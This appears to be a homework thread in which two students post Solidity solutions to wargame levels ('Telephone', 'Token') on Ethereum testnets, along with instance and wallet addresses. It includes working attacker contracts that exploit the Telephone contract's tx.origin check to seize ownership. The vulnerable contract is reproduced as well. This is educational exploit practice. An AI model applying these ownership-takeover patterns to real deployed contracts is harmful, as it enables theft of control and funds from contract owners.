hw 4

[thor4]

Telephone

// attacker-telephone.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./ITelephone.sol";

contract AttackerTelephone {

    function changeOwner(address _owner, address _telephoneAddress) public {
        ITelephone telephone = ITelephone(_telephoneAddress);

        telephone.changeOwner(_owner);
    }

    // external fallback function to receive funds
    receive() external payable {}
}

// ITelephone.sol interface
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface ITelephone {
    function changeOwner(address _owner) external;
}

instance: 0x63b3FD2d4FfC9a452004495D0cDFA2fAFB181c6c
attacker: 0x53796ea318801706DF88A60B644439187bc52C5b
network: Sepolia
wallet: 0xCBcE3bE28474c80415903947BC435265E2e5e61a

Token

instance: 0x838c718FD3102282FE05572CDAA333deba741CA4
network: Sepolia
wallet: 0xCBcE3bE28474c80415903947BC435265E2e5e61a

[aldrinmayen]

// couldn't create a new pull request i will just comment here
address: 0x98c074DD95aA3607dBA6cBaFbAb68b6FF83180f0
network: Goerli
instance: 0x0Db09afF324cCcD92C323F2b3f74e63a7B65EbC3

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

//claim ownership of this contract!
//tx.origin is the origin address that create a contract
//msg.sender is the origina address of the external call
// my approach i s to create a contract this contract with function hack that calls the origin contract and makes tx,origin != msg.sender 
contract Hacking {
 constructor(address _target){
     Telephone(_target).changeOwner(msg.sender);
 }
}

contract Telephone {

  address public owner;

  constructor() {
    owner = msg.sender;
  }


  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

here is the contract I used for hacking 0x3eA885773d7a3A9B588AD184C3393Cd90eCde9fc